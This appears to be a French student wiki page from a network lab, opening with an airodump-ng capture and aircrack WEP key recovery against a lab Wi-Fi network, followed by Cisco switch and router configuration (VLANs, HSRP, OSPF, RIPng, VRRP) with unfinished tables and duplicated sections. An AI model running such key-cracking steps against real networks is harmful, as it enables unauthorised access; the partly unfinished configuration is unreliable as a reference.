   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	</feed>